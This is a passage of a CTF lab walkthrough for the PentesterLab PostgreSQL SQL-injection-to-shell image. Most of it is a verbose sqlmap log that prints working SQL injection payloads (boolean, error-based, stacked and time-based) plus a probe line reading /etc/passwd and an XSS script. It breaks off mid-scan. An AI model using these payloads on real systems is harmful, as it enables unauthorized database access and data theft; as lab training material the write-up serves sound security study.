CTF Lab Series - Pentester Lab: From SQL injection to Shell: PostgreSQL edition - Author: 陌度

Download link

https://download.vulnhub.com/pentesterlab/from_sqli_to_shell_pg_edition_i386.iso

Hands-on walkthrough

Use the netdiscover command to find the target machine's IP address.


Use nmap to enumerate the ports the target has open.

Open the target in a browser.

The id parameter can be tested directly with sqlmap. Below is the recorded output of sqlmap running against the PostgreSQL back end.

root@kali:~# sqlmap -u "http://192.168.0.104/cat.php?id=1" --dbms=PostgreSQL -p  id -v 3  --batch --level 5 --risk 3 
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:13:20 /2019-08-20/

[00:13:20] [DEBUG] cleaning up configuration parameters
[00:13:20] [DEBUG] setting the HTTP timeout
[00:13:20] [DEBUG] setting the HTTP User-Agent header
[00:13:20] [DEBUG] creating HTTP requests opener object
[00:13:20] [DEBUG] forcing back-end DBMS to user defined value
[00:13:20] [DEBUG] setting the HTTP Referer header to the target URL
[00:13:20] [DEBUG] setting the HTTP Host header to the target URL
[00:13:20] [INFO] testing connection to the target URL
[00:13:21] [INFO] heuristics detected web page charset 'ascii'
[00:13:21] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:13:21] [PAYLOAD] 7276 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
[00:13:21] [INFO] testing if the target URL content is stable
[00:13:22] [INFO] target URL content is stable
[00:13:22] [PAYLOAD] 1(()(("(.)'
[00:13:22] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'PostgreSQL')
[00:13:22] [PAYLOAD] 1'eESWnV<'">ectfSz
[00:13:22] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[00:13:22] [INFO] testing for SQL injection on GET parameter 'id'
[00:13:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:13:22] [PAYLOAD] 1) AND 8098=8070-- wZWN
[00:13:22] [WARNING] reflective value(s) found and filtering out
[00:13:22] [PAYLOAD] 1) AND 1338=1338-- lSYD
[00:13:22] [PAYLOAD] 1) AND 5350=8599 AND (9067=9067
[00:13:22] [PAYLOAD] 1) AND 1338=1338 AND (8123=8123
[00:13:22] [PAYLOAD] 1)) AND 8005=1307 AND ((7970=7970
[00:13:22] [PAYLOAD] 1)) AND 1338=1338 AND ((3658=3658
[00:13:22] [PAYLOAD] 1))) AND 6537=4975 AND (((5830=5830
[00:13:22] [PAYLOAD] 1))) AND 1338=1338 AND (((8393=8393
[00:13:22] [PAYLOAD] 1 AND 3910=7600
[00:13:22] [DEBUG] setting match ratio for current parameter to 0.854
[00:13:22] [PAYLOAD] 1 AND 1338=1338
[00:13:22] [PAYLOAD] 1 AND 2641=9318
[00:13:22] [DEBUG] adjusting match ratio for current parameter to 0.909
[00:13:22] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Ruby")
[00:13:22] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (NOT)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (comment)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (comment)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (DUAL)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (DUAL - original value)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (CASE)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (CASE - original value)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'HAVING boolean-based blind - WHERE, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - ORDER BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)' because the payload for boolean-based blind has already been identified
[00:13:22] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:13:22] [PAYLOAD] 1 AND 7925=CAST((CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (7925=7925) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)) AS NUMERIC)
[00:13:22] [INFO] GET parameter 'id' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable 
[00:13:22] [DEBUG] skipping test 'PostgreSQL OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL error-based - Parameter replace' because the payload for error-based has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)' because the payload for error-based has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL error-based - ORDER BY, GROUP BY clause' because the payload for error-based has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)' because the payload for error-based has already been identified
[00:13:22] [INFO] testing 'PostgreSQL inline queries'
[00:13:22] [PAYLOAD] (SELECT (CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (7597=7597) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)))
[00:13:22] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[00:13:22] [PAYLOAD] 1;SELECT PG_SLEEP(5)--
[00:13:22] [WARNING] time-based comparison requires larger statistical model, please wait............... (done)                                                                                                   
[00:13:27] [PAYLOAD] 1;SELECT PG_SLEEP(0)--
[00:13:27] [PAYLOAD] 1;SELECT PG_SLEEP(5)--
[00:13:32] [INFO] GET parameter 'id' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable 
[00:13:32] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because the payload for stacked queries has already been identified
[00:13:32] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query - comment)' because the payload for stacked queries has already been identified
[00:13:32] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query)' because the payload for stacked queries has already been identified
[00:13:32] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc - comment)' because the payload for stacked queries has already been identified
[00:13:32] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc)' because the payload for stacked queries has already been identified
[00:13:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[00:13:32] [PAYLOAD] 1 AND 4944=(SELECT 4944 FROM PG_SLEEP(5))
[00:13:37] [PAYLOAD] 1 AND 4944=(SELECT 4944 FROM PG_SLEEP(0))
[00:13:37] [PAYLOAD] 1 AND 4944=(SELECT 4944 FROM PG_SLEEP(5))
[00:13:42] [INFO] GET parameter 'id' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable 
[00:13:42] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind (comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind (comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL > 8.1 time-based blind - Parameter replace' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (MAKE_SET)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (ELT)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (ELT - original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (bool*int)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (bool*int - original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Informix boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Informix boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft Access boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft Access boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft Access boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (XMLType)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.5 error-based - Parameter replace (EXP)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Parameter replace' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle error-based - Parameter replace' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird error-based - Parameter replace' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle error-based - ORDER BY, GROUP BY clause' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird error-based - ORDER BY clause' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL inline queries' because its declared DBMS is different than provided
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase inline queries' because its declared DBMS is different than provided
[00:13:42] [DEBUG] skipping test 'Oracle inline queries' because its declared DBMS is different than provided
[00:13:42] [DEBUG] skipping test 'SQLite inline queries' because its declared DBMS is different than provided
[00:13:42] [DEBUG] skipping test 'Firebird inline queries' because its declared DBMS is different than provided
[00:13:42] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries (comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries (query SLEEP)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (heavy query - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (heavy query)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries (comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle stacked queries (heavy query - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle stacked queries (heavy query)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'IBM DB2 stacked queries (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'IBM DB2 stacked queries (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy query - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy query)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird stacked queries (heavy query - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird stacked queries (heavy query)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB stacked queries (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB stacked queries (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 1.7.2 stacked queries (heavy query - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 1.7.2 stacked queries (heavy query)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 2.0 stacked queries (heavy query - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 2.0 stacked queries (heavy query)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind (comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL <= 5.0.11 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
